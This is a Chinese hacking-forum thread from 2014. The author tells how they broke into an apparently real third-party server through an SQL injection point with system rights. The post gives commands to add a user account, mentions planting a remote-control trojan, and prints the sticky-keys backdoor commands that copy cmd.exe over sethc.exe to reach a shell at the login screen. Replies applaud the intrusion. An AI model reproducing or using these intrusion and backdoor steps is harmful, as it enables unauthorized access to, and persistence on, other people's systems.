查看: 42330|回复: 53

一次sa连不上远程桌面的解决方案

[复制链接]
发表于 2014-8-5 15:59:35 | 显示全部楼层 |阅读模式
今天群里的旺大鸟同学给了一个注入点 sa权限的

游客,如果您要查看本帖隐藏内容请回复


我打开一看的确是

1.jpg

system权限

2.jpg

心想 这不是分分钟 拿下么

当我轻轻的把 net user shen shen /add 输入进去 自信回车

蛋疼的是出现了

返回信息“找不到组名  请键入 NET HELPMSG 2220 以获得更多的帮助”

难道管理疯了 把注册表group删了?

试了下导入reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Groups

还是不行

上远控  不上线(nod杀了)

windows读取密码  无回显

小折腾了几下无果

难道放弃了么 不  system 拿不下不甘心

吃了根冰棍淡定下

脑海中闪过一个思路


copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\sethc.exe

利用shift调出cmd  在建立一个explorer

3.jpg

哈哈  进来了   界面有点奇葩 未登录 不过都可以操作

4.jpg

评分

参与人数 4i币 +62 收起 理由
KingSKY + 16 8JB~~~~~~~~~~~
Free_小东 + 20 赏你的
li141688 + 10 姐姐我给你金币
C4r1st + 16 甩你8JB可怜可怜你

查看全部评分

回复

使用道具 举报

发表于 2014-8-5 16:01:31 | 显示全部楼层
神仙姐姐,嘿嘿 我来了。。。
回复 支持 反对

使用道具 举报

发表于 2014-8-5 16:04:57 | 显示全部楼层
此贴甚好,
回复 支持 反对

使用道具 举报

发表于 2014-8-5 16:07:33 | 显示全部楼层
亮点在哪?

点评

建explorer跳过登录啊  详情 回复 发表于 2014-8-5 16:08
回复 支持 反对

使用道具 举报

 楼主| 发表于 2014-8-5 16:08:30 | 显示全部楼层
本帖最后由 神仙 于 2014-8-5 16:10 编辑


建explorer跳过登录啊  马蛋 你不感觉很有想法么

点评

没想法。。cmd无法执行提权命令时经常用  详情 回复 发表于 2014-8-5 18:22
回复 支持 反对

使用道具 举报

发表于 2014-8-5 16:09:22 | 显示全部楼层
!!!!看看咯
回复 支持 反对

使用道具 举报

发表于 2014-8-5 16:29:59 | 显示全部楼层

此贴甚好,
回复 支持 反对

使用道具 举报

头像被屏蔽
发表于 2014-8-5 16:39:42 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

发表于 2014-8-5 17:08:45 | 显示全部楼层
感谢分享.谢谢神仙
回复 支持 反对

使用道具 举报

发表于 2014-8-5 17:10:42 | 显示全部楼层
勾掉啊&……
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-10 06:38 , Processed in 0.027945 second(s), 14 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部